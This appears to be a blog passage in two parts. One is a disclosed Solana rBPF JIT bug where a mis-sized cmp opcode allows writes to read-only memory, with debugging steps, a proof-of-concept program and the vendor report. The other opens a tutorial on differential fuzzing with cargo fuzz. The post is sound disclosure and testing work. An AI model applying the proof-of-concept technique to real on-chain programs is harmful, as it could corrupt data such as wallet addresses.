use solana_rbpf::vm::InstructionMeter;

fn dump_insns<E: UserDefinedError, I: InstructionMeter>(executable: &Executable<E, I>) {
    let analysis = Analysis::from_executable(executable);
    // eprint!("Using the following disassembly");
    analysis.disassemble(&mut std::io::stdout()).unwrap();
}

fn main() {
    let config = Config::default();
    let mut code = BpfCode::default();
    let mut jit_mem = Vec::new();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", false).unwrap();
    code
        .load(MemSize::DoubleWord).set_dst(9).push()
        .load(MemSize::Word).set_imm(1).push()
        .store_x(MemSize::HalfWord).set_dst(9).set_off(0).set_src(0).push()
        .exit().push();
    let mut prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    dump_insns(&executable);
    let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
    let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
    let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
    if let Ok(_) = jit_res {
        eprintln!("{} => {:?} ({:?})", 0, jit_res, &jit_mem);
    }
}

This just sets up and executes the following BPF assembly:

entrypoint:
    lddw r9, 0x100000000
    stxh [r9+0x0], r0
    exit

This assembly simply writes a 0 to 0x100000000.

For the next part: please, for the love of god, use GEF.

$ cargo +stable build --example oob-write
$ gdb ./target/debug/examples/oob-write
gef➤  break src/vm.rs:1061 # after the JIT'd code is prepared
gef➤  run
gef➤  print self.executable.ro_section.buf.ptr.pointer 
gef➤  awatch *$1 # break if we modify the readonly section
gef➤  record full # set up for reverse execution
gef➤  continue

After that last continue, we effectively execute until we hit the write access to our read-only section. Additionally, we can step backwards in the program until we find our faulty behaviour.

The watched memory is written to as a result of this x86 store instruction (as a reminder, this is the branch for stxh). Seeing the emit_address_translation call above it, we can determine that that function likely handles the address translation and readonly checks.

Further inspection shows that emit_address_translation actually emits a call to… something:

emit_call(jit, TARGET_PC_TRANSLATE_MEMORY_ADDRESS + len.trailing_zeros() as usize + 4 * (access_type as usize))?;

Okay, so this is some kind of global offset for this JIT program to translate the memory address. By searching for TARGET_PC_TRANSLATE_MEMORY_ADDRESS elsewhere in the program, we find a loop which initialises different kinds of memory translations.

Scrolling through this, we find our access check:

X86Instruction::cmp_immediate(OperandSize::S8, RAX, 0, Some(X86IndirectAccess::Offset(25))).emit(self)?; // region.is_writable == 0

Okay – so the x86 cmp instruction to find is one that uses a destination of [rax+0x19]. A couple of rsi (reverse-stepi) commands later, we find such an instruction:

cmp    DWORD PTR [rax+0x19], 0x0

Which is, notably, not using an 8-bit operand as the cmp_immediate call suggests. So what’s going on here?

x86 cmp operand size woes

Here is the definition of X86Instruction::cmp_immediate:

pub fn cmp_immediate(
    size: OperandSize,
    destination: u8,
    immediate: i64,
    indirect: Option<X86IndirectAccess>,
) -> Self {
    Self {
        size,
        opcode: 0x81,
        first_operand: RDI,
        second_operand: destination,
        immediate_size: OperandSize::S32,
        immediate,
        indirect,
        ..Self::default()
    }
}

This creates an x86 instruction with the opcode 0x81. Inspecting closer and cross-referencing with an x86-64 opcode reference, you can find that opcode 0x81 is only defined for 16-, 32-, and 64-bit register operands. If you want to use an 8-bit register operand, you’ll need to use the 0x80 opcode variant.

This is precisely the patch applied.
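
If you want to see the operand-size difference concretely, a quick sketch with the Capstone Python bindings (assuming they are installed) disassembles both hand-assembled encodings of the comparison:

# Opcode 0x80 is the 8-bit form (imm8); 0x81 is the 16/32/64-bit form (imm32 here).
# ModRM 0x78 encodes [rax + disp8] with /7 (CMP), followed by disp 0x19.
from capstone import Cs, CS_ARCH_X86, CS_MODE_64

md = Cs(CS_ARCH_X86, CS_MODE_64)
byte_cmp  = bytes([0x80, 0x78, 0x19, 0x00])                    # imm8
dword_cmp = bytes([0x81, 0x78, 0x19, 0x00, 0x00, 0x00, 0x00])  # imm32

for code in (byte_cmp, dword_cmp):
    for insn in md.disasm(code, 0):
        print(insn.mnemonic, insn.op_str)
# cmp byte ptr [rax + 0x19], 0
# cmp dword ptr [rax + 0x19], 0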

A quick side note about testing code with different compilers

This bug actually was a bit weirder than it seems at first. Due to differences in Rust struct padding between compiler versions, at the time I reported the bug the JIT/interpreter difference appeared only sporadically in stable release builds. As a result, it's quite likely that no one would have noticed the bug until the next Rust release version.

From my report:

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

Proof of concept

Alright, now to create a PoC so that the people inspecting the bug can validate it. Like last time, we’ll create an ELF, along with a few different demonstrations of the effects of the bug. Specifically, we want to demonstrate that read-only values in the BPF target can be modified persistently, as our writes affect the executable and thus all future executions of the JIT program.

value_in_ro.c

This program should fail, as the data to be overwritten should be read-only. It will be executed by howdy.rs.

typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}
howdy.rs

This program loads the compiled version of value_in_ro.c and attaches a log syscall so that we can see the behaviour internally. I confirmed that this syscall did not affect the runtime behaviour.

use std::collections::BTreeMap;
use std::fs::File;
use std::io::Read;
use solana_rbpf::{
    elf::Executable,
    insn_builder::{
        BpfCode,
        Instruction,
        IntoBytes,
        MemSize,
    },
    user_error::UserError,
    verifier::check,
    vm::{Config, EbpfVm, SyscallRegistry, TestInstructionMeter},
};
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::error::UserDefinedError;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::vm::{InstructionMeter, SyscallObject};

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf);
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call);
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

This program, when executed, has the following output:

howdy
evil!
evil!
evil!
evil!
evil!
evil!
evil!

These first two files demonstrate the ability to overwrite the readonly data present in binaries persistently. Notice that we actually execute the JIT’d code multiple times, yet our changes to the value in data are persistent.

Implications

Suppose that there was a faulty offset or a user-controlled offset present in a BPF-based on-chain program. A malicious user could modify the readonly data of the program to replace certain contexts. In the best case scenario, this might lead to DoS of the program. In the worst case, this could lead to the replacement of fund amounts, of wallet addresses, etc.

Reporting

Having assembled my proof-of-concepts, my implications, and so on, I sent in the following report to Solana on February 4th:

Report for bug 2 as submitted to Solana

An incorrectly sized memory operand emitted by src/jit.rs:1490 may lead to .rodata section corruption due to an incorrect is_writable check. The cmp emitted is cmp DWORD PTR [rax+0x19], 0x0. As a result, when the uninitialised data present in the field padding of MemoryRegion is non-zero, the comparison will fail and assume that the section is writable. The data which is overwritten is persistent during the lifetime of the Executable instance as the data overwritten is in Executable.ro_section and thus affects future executions of the program without recompilation.

It is likely that this bug was not discovered earlier due to inconsistent behaviour between various versions of Rust. During testing, it was found that stable release did not consistently have non-zero field padding where stable debug, nightly debug, and nightly release did.

The first attack scenario where this vulnerability may be leveraged is in corruption of believed read-only data; see value_in_ro.{c,so} (intended to be placed within tests/elfs/) as an example of this behaviour. The example provided is contrived, but in scenarios where BPF programs do not correctly sanitise offsets in input, it may be possible for remote attackers to craft payloads which corrupt data within the .rodata section and thus replace secrets, operational data, etc. In the worst case, this may include replacement of critical data such as fixed wallet addresses for the lifetime of the Executable instance, which may be many executions. To test this behaviour, refer to howdy.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

The second attack scenario is in corruption of BPF source code, which poisons future analysis and compilation. In the worst case (which is probably not a valid scenario), if the Executable is erroneously JIT compiled a second time after being executed in JIT once, the JIT compilation may emit unchecked BPF instructions as the verifier used in from_elf/from_text_bytes is not used per-compilation. Analysis and tracing is similarly corrupted, which may be leveraged to obscure or misrepresent the instructions which were previously executed. An example of the latter is provided in analysis-corruption.rs (intended to be placed within examples/). If you find that corruption behaviour does not appear, try using a different optimisation level or compiler.

While this vulnerability is largely uncategorised by the security policy provided, due to the possibility of the corruption of believed read-only data, I propose that this vulnerability be categorised under Other Attacks or Safety Violations.

value_in_ro.c (.so available upon request)
typedef unsigned char uint8_t;
typedef unsigned long int uint64_t;

extern void log(const char*, uint64_t);

static const char data[] = "howdy";

extern uint64_t entrypoint(const uint8_t *input) {
  log(data, 5);
  char *overwritten = (char *)data;
  overwritten[0] = 'e';
  overwritten[1] = 'v';
  overwritten[2] = 'i';
  overwritten[3] = 'l';
  overwritten[4] = '!';
  log(data, 5);

  return 0;
}
analysis-corruption.rs
use std::collections::BTreeMap;

use solana_rbpf::elf::Executable;
use solana_rbpf::elf::register_bpf_function;
use solana_rbpf::insn_builder::BpfCode;
use solana_rbpf::insn_builder::Instruction;
use solana_rbpf::insn_builder::IntoBytes;
use solana_rbpf::insn_builder::MemSize;
use solana_rbpf::static_analysis::Analysis;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&mut bpf_functions, 0, "entrypoint", true).unwrap();
    let mut code = BpfCode::default();
    code
        .load(MemSize::DoubleWord).set_dst(0).set_imm(0).push()
        .load(MemSize::Word).set_imm(1).push()
        .store(MemSize::DoubleWord).set_dst(0).set_off(0).set_imm(0).push()
        .exit().push();
    let prog = code.into_bytes();
    assert!(check(prog, &config).is_ok());
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(prog, None, config, SyscallRegistry::default(), bpf_functions).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    let jit_res = {
        let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
        let res = jit_vm.execute_program_jit(&mut jit_meter);
        let jit_tracer = jit_vm.get_tracer();
        let analysis = Analysis::from_executable(&executable);
        let stderr = std::io::stderr();
        jit_tracer.write(&mut stderr.lock(), &analysis).unwrap();
        res
    };
    eprintln!("{} => {:?}", 1, jit_res);
}
howdy.rs
use std::fs::File;
use std::io::Read;

use solana_rbpf::elf::Executable;
use solana_rbpf::user_error::UserError;
use solana_rbpf::verifier::check;
use solana_rbpf::vm::Config;
use solana_rbpf::vm::EbpfVm;
use solana_rbpf::vm::SyscallObject;
use solana_rbpf::vm::SyscallRegistry;
use solana_rbpf::vm::TestInstructionMeter;

fn main() {
    let config = Config {
        enable_instruction_tracing: true,
        ..Config::default()
    };
    let mut jit_mem = vec![0; 32];
    let mut elf = Vec::new();
    File::open("tests/elfs/value_in_ro.so").unwrap().read_to_end(&mut elf).unwrap();
    let mut syscalls = SyscallRegistry::default();
    syscalls.register_syscall_by_name(b"log", solana_rbpf::syscalls::BpfSyscallString::call).unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_elf(&elf, Some(check), config, syscalls).unwrap();
    assert!(Executable::jit_compile(&mut executable).is_ok());
    for _ in 0..4 {
        let jit_res = {
            let mut jit_vm = EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], &mut jit_mem).unwrap();
            let mut jit_meter = TestInstructionMeter { remaining: 1 << 18 };
            let res = jit_vm.execute_program_jit(&mut jit_meter);
            res
        };
        eprintln!("{} => {:?}", 1, jit_res);
    }
}

The bug was patched in a mere 4 hours.

Solana classified this bug as a Denial-of-Service (Non-RPC) and awarded $100k. I disagreed strongly with this classification, but Solana said that due to the low likelihood of the exploitation of this bug (requiring a vulnerability in the on-chain program) they would offer $100k instead of the originally suggested $1m or $400k. They would not move on this point.

However, I would offer that, if that was actually the basis for the bug classification, they should update their Security Policy to reflect that meaning. It was obviously very disappointing to hear that they would not be offering the bounty I expected given the classification categories provided.

Okay, so what’d you do with the money??

It would be bad form of me to not explain the incredible flexibility shown by Solana in terms of how they handled my payout. I intended to donate the funds to the Texas A&M Cybersecurity Club, at which I gained a lot of the skills necessary to perform this research and these exploits, and Solana was very willing to sidestep their listed policy and donate the funds directly in USD rather than making me handle the tokens on my own, which would have dramatically affected how much I could have donated due to tax. So, despite my concerns regarding their policy, I was very pleased with their willingness to accommodate my wishes with the bounty payout.

Earn $200K by fuzzing for a weekend: Part 1

By: addison
11 May 2022 at 07:00

By applying well-known fuzzing techniques to a popular target, I found several bugs that in total yielded over $200K in bounties. In this article I will demonstrate how powerful fuzzing can be when applied to software which has not yet faced sufficient testing.

If you’re here just for the bug disclosures, see Part 2, though I encourage you all, even those who have not yet tried their hand at fuzzing, to read through this.

Exposition

A few friends and I ran a little Discord server (now a Matrix space) in which we discussed security and vulnerability research techniques. One of the things we have running in the server is a bot which posts every single CVE as they come out. And, yeah, I read a lot of them.

One day, the bot posted something that caught my eye:

This marks the beginning of our timeline: January 28th. I had noticed this CVE in particular for two reasons:

  • it was BPF, which I find to be an absurdly cool concept as it’s used in the Linux kernel (a JIT compiler in the kernel!!! what!!!)
  • it was a JIT compiler written in Rust

This CVE showed up almost immediately after I had developed some relatively intensive fuzzing for some of my own Rust software (specifically, a crate for verifying sokoban solutions where I had observed similar issues and thought “that looks familiar”).

Knowing what I had learned from my experience fuzzing my own software and that bugs in Rust programs could be quite easily found with the combo of cargo fuzz and arbitrary, I thought: “hey, why not?”.

The Target, and figuring out how to test it

Solana, as several of you likely know, "is a decentralized blockchain built to enable scalable, user-friendly apps for the world". They are primarily known for their cryptocurrency, SOL, but they also operate a blockchain which can run essentially any form of smart contract.

rBPF in particular is a self-described “Rust virtual machine and JIT compiler for eBPF programs”. Notably, it implements both an interpreter and a JIT compiler for BPF programs. In other words: two different implementations of the same program, which theoretically exhibited the same behaviour when executed.

I was lucky enough to both take a software testing course in university and to have been part of a research group doing fuzzing (admittedly, we were fuzzing hardware, not software, but the concepts translate). A concept that I had hung onto in particular is the idea of test oracles – a way to distinguish what is “correct” behaviour and what is not in a design under test.

In particular, something that stood out to me about the presence of both an interpreter and a JIT compiler in rBPF is that we, in effect, had a perfect pseudo-oracle; as Wikipedia puts it:

a separately written program which can take the same input as the program or system under test so that their outputs may be compared to understand if there might be a problem to investigate.

Those of you who have more experience in fuzzing will recognise this concept as differential fuzzing, but I think we can often overlook that differential fuzzing is just another face of a pseudo-oracle.

In this particular case, we can execute the interpreter, one implementation of rBPF, and then execute the JIT compiled version, another implementation, with the same inputs (i.e., memory state, entrypoint, code, etc.) and see if their outputs are different. If they are, one of them must necessarily be incorrect per the description of the rBPF crate: two implementations of exactly the same behaviour.
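
Stripped of the rBPF specifics, the check boils down to something like this sketch (Python for brevity; the real fuzzer, shown in the next section, is written in Rust, and the function names here are purely illustrative):

# Minimal sketch of a differential (pseudo-oracle) check: run the same input
# through two implementations that promise identical behaviour and treat any
# divergence as a bug in at least one of them.
def differential_check(program, memory, interpret, jit_execute):
    interp_result = interpret(program, list(memory))
    jit_result = jit_execute(program, list(memory))
    if interp_result != jit_result:
        raise AssertionError(
            "divergence: interpreter=%r jit=%r" % (interp_result, jit_result)
        )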

Writing a fuzzer

To start off, let’s just throw a bunch of inputs at it without really tuning anything in particular. This allows us to sanity-check that our basic fuzzing implementation actually works as we expect.

The dumb fuzzer

First, we need to figure out how to execute the interpreter. Thankfully, there are several examples of this readily available in a variety of tests. I referenced the test_interpreter_and_jit macro present in ubpf_execution.rs as the basis for how my so-called “dumb” fuzzer executes.

I’ve provided a sequence of components you can look at one chunk at a time before moving on to the whole fuzzer. Just click on the dropdowns to view the code relevant to that step. You don’t necessarily need to read them to understand the point of this post.

Step 1: Defining our inputs

We must define our inputs such that they’re actually useful for our fuzzer. Thankfully, arbitrary makes it near trivial to derive an input from raw bytes.

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

If you want to see the definition of ConfigTemplate, you can check it out in common.rs, but all you need to know is that its purpose is to test the interpreter under a variety of different execution configurations; its internals aren’t particularly important for understanding the rest of the fuzzer.
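
Purely as an illustration (this is not the real definition; see common.rs for that), a cut-down ConfigTemplate could look something like the following, with each variant mapping onto a Config that toggles flags the interpreter consults at runtime:

use solana_rbpf::vm::Config;

// Illustrative stand-in for the real ConfigTemplate in common.rs.
#[derive(arbitrary::Arbitrary, Debug)]
enum ConfigTemplate {
    Default,
    NoInstructionMeter,
    DynamicStackFrames,
    TracingEnabled,
}

impl From<ConfigTemplate> for Config {
    fn from(template: ConfigTemplate) -> Config {
        match template {
            ConfigTemplate::Default => Config::default(),
            ConfigTemplate::NoInstructionMeter => Config {
                enable_instruction_meter: false,
                ..Config::default()
            },
            ConfigTemplate::DynamicStackFrames => Config {
                dynamic_stack_frames: true,
                ..Config::default()
            },
            ConfigTemplate::TracingEnabled => Config {
                enable_instruction_tracing: true,
                ..Config::default()
            },
        }
    }
}

This is also why the fuzz targets call data.template.into() to obtain the Config they pass to the verifier and the VM.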

Step 2: Setting up the VM

Setting up the fuzz target and the VM comes next. This will allow us to not only execute our test, but later to actually check if the behaviour is correct.

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    // TODO in step 3
});

You can find the details of how fuzz_target works in the Rust Fuzz Book, which covers it in more depth than would be appropriate here.
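
As a rough mental model (simplified, and not the actual macro expansion), the typed form of fuzz_target! boils down to decoding the raw bytes libFuzzer hands us into our DumbFuzzData via its derived Arbitrary implementation, and silently skipping inputs that can’t be decoded:

use arbitrary::{Arbitrary, Unstructured};

// Hypothetical helper showing roughly what happens to each raw input; the real
// macro in libfuzzer-sys also installs panic hooks and handles other details.
fn run_raw_input(bytes: &[u8]) {
    let u = Unstructured::new(bytes);
    match DumbFuzzData::arbitrary_take_rest(u) {
        // The body of the fuzz_target! closure runs here with the decoded input.
        Ok(data) => {
            let _ = data;
        }
        // Bytes that can't be decoded into a DumbFuzzData are simply skipped.
        Err(_) => {}
    }
}

The practical upshot is that libFuzzer mutates raw bytes, while our closure only ever sees well-formed DumbFuzzData values.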

Step 3: Executing our input and comparing output

In this step, we just execute the VM with our provided input. In future iterations, we’ll compare the output of the interpreter against that of the JIT, but in this version, we’re just executing the interpreter to see if we can induce crashes.

fuzz_target!(|data: DumbFuzzData| {
    // see step 2 for this bit

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

I use black_box here, but I’m not entirely convinced that it’s necessary. I added it to ensure that the result of the interpreted program’s execution isn’t simply discarded and the execution optimised away as unnecessary, but I’m fairly certain it wouldn’t be regardless.

Note that we are not checking whether the execution failed here. If the BPF program fails: we don’t care! We only care if the VM itself crashes for any reason.

Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![feature(bench_black_box)]
#![no_main]

use std::collections::BTreeMap;
use std::hint::black_box;

use libfuzzer_sys::fuzz_target;

use solana_rbpf::{
    ebpf,
    elf::{register_bpf_function, Executable},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;

#[derive(arbitrary::Arbitrary, Debug)]
struct DumbFuzzData {
    template: ConfigTemplate,
    prog: Vec<u8>,
    mem: Vec<u8>,
}

fuzz_target!(|data: DumbFuzzData| {
    let prog = data.prog;
    let config = data.template.into();
    if check(&prog, &config).is_err() {
        // verify please
        return;
    }
    let mut mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        &prog,
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    let mem_region = MemoryRegion::new_writable(&mut mem, ebpf::MM_INPUT_START);
    let mut vm =
        EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![mem_region]).unwrap();

    drop(black_box(vm.execute_program_interpreted(
        &mut TestInstructionMeter { remaining: 1024 },
    )));
});

Theoretically, an up-to-date version is available in the rBPF repo.

Evaluation

$ cargo +nightly fuzz run dumb -- -max_total_time=300
... snip ...
#2902510	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 134/3126 MS: 3 ChangeBit-InsertByte-PersAutoDict- DE: "\x07\xff\xff3"-
#2902537	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9675 rss: 355Mb L: 60/3126 MS: 2 ChangeBinInt-EraseBytes-
#2905608	REDUCE cov: 1092 ft: 2147 corp: 724/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 101/3126 MS: 1 EraseBytes-
#2905770	NEW    cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9685 rss: 355Mb L: 61/3126 MS: 2 ShuffleBytes-CrossOver-
#2906805	DONE   cov: 1092 ft: 2155 corp: 725/58Kb lim: 4096 exec/s: 9657 rss: 355Mb
Done 2906805 runs in 301 second(s)

After running the fuzzer for a fixed amount of time (note the use of the -max_total_time flag), we can evaluate its effectiveness at finding interesting inputs by checking its coverage. In this case, I want to determine just how well it covers the function which handles interpreter execution. To do so, I issue the following commands:

$ cargo +nightly fuzz coverage dumb
$ rust-cov show -Xdemangler=rustfilt fuzz/target/x86_64-unknown-linux-gnu/release/dumb -instr-profile=fuzz/coverage/dumb/coverage.profdata -show-line-counts-or-regions -name=execute_program_interpreted_inner
Command output of rust-cov

If you’re not familiar with llvm coverage output, the first column is the line number, the second column is the number of times that that particular line was hit, and the third column is the code itself.

<solana_rbpf::vm::EbpfVm<solana_rbpf::user_error::UserError, solana_rbpf::vm::TestInstructionMeter>>::execute_program_interpreted_inner:
  709|    763|    fn execute_program_interpreted_inner(
  710|    763|        &mut self,
  711|    763|        instruction_meter: &mut I,
  712|    763|        initial_insn_count: u64,
  713|    763|        last_insn_count: &mut u64,
  714|    763|    ) -> ProgramResult<E> {
  715|    763|        // R1 points to beginning of input memory, R10 to the stack of the first frame
  716|    763|        let mut reg: [u64; 11] = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, self.stack.get_frame_ptr()];
  717|    763|        reg[1] = ebpf::MM_INPUT_START;
  718|    763|
  719|    763|        // Loop on instructions
  720|    763|        let config = self.executable.get_config();
  721|    763|        let mut next_pc: usize = self.executable.get_entrypoint_instruction_offset()?;
                                                                                                  ^0
  722|    763|        let mut remaining_insn_count = initial_insn_count;
  723|   136k|        while (next_pc + 1) * ebpf::INSN_SIZE <= self.program.len() {
  724|   135k|            *last_insn_count += 1;
  725|   135k|            let pc = next_pc;
  726|   135k|            next_pc += 1;
  727|   135k|            let mut instruction_width = 1;
  728|   135k|            let mut insn = ebpf::get_insn_unchecked(self.program, pc);
  729|   135k|            let dst = insn.dst as usize;
  730|   135k|            let src = insn.src as usize;
  731|   135k|
  732|   135k|            if config.enable_instruction_tracing {
  733|      0|                let mut state = [0u64; 12];
  734|      0|                state[0..11].copy_from_slice(&reg);
  735|      0|                state[11] = pc as u64;
  736|      0|                self.tracer.trace(state);
  737|   135k|            }
  738|       |
  739|   135k|            match insn.opc {
  740|   135k|                _ if dst == STACK_PTR_REG && config.dynamic_stack_frames => {
  741|    361|                    match insn.opc {
  742|     16|                        ebpf::SUB64_IMM => self.stack.resize_stack(-insn.imm),
  743|    345|                        ebpf::ADD64_IMM => self.stack.resize_stack(insn.imm),
  744|       |                        _ => {
  745|       |                            #[cfg(debug_assertions)]
  746|      0|                            unreachable!("unexpected insn on r11")
  747|       |                        }
  748|       |                    }
  749|       |                }
  750|       |
  751|       |                // BPF_LD class
  752|       |                // Since this pointer is constant, and since we already know it (ebpf::MM_INPUT_START), do not
  753|       |                // bother re-fetching it, just use ebpf::MM_INPUT_START already.
  754|       |                ebpf::LD_ABS_B   => {
  755|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  756|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  757|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  758|       |                },
  759|       |                ebpf::LD_ABS_H   =>  {
  760|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  761|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  762|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  763|       |                },
  764|       |                ebpf::LD_ABS_W   => {
  765|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  766|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  767|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  768|       |                },
  769|       |                ebpf::LD_ABS_DW  => {
  770|      4|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(insn.imm as u32 as u64);
  771|      4|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  772|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  773|       |                },
  774|       |                ebpf::LD_IND_B   => {
  775|      2|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  776|      2|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^0
  777|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  778|       |                },
  779|       |                ebpf::LD_IND_H   => {
  780|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  781|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^0
  782|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  783|       |                },
  784|       |                ebpf::LD_IND_W   => {
  785|      7|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  786|      7|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^0
  787|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  788|       |                },
  789|       |                ebpf::LD_IND_DW  => {
  790|      3|                    let vm_addr = ebpf::MM_INPUT_START.wrapping_add(reg[src]).wrapping_add(insn.imm as u32 as u64);
  791|      3|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u64);
                                      ^0
  792|      0|                    reg[0] = unsafe { *host_ptr as u64 };
  793|       |                },
  794|       |
  795|      0|                ebpf::LD_DW_IMM  => {
  796|      0|                    ebpf::augment_lddw_unchecked(self.program, &mut insn);
  797|      0|                    instruction_width = 2;
  798|      0|                    next_pc += 1;
  799|      0|                    reg[dst] = insn.imm as u64;
  800|      0|                },
  801|       |
  802|       |                // BPF_LDX class
  803|       |                ebpf::LD_B_REG   => {
  804|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  805|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u8);
                                      ^2
  806|      2|                    reg[dst] = unsafe { *host_ptr as u64 };
  807|       |                },
  808|       |                ebpf::LD_H_REG   => {
  809|     18|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  810|     18|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u16);
                                      ^6
  811|      6|                    reg[dst] = unsafe { *host_ptr as u64 };
  812|       |                },
  813|       |                ebpf::LD_W_REG   => {
  814|    365|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
  815|    365|                    let host_ptr = translate_memory_access!(self, vm_addr, AccessType::Load, pc, u32);
                                      ^348
  816|    348|                    reg[dst] = unsafe { *host_ptr as u64 };
  817|       |                },
  818|       |                ebpf::LD_DW_REG  => {
  819|     15|                    let vm_addr = (reg[src] as i64).wrapping_add(insn.off as i64) as u64;
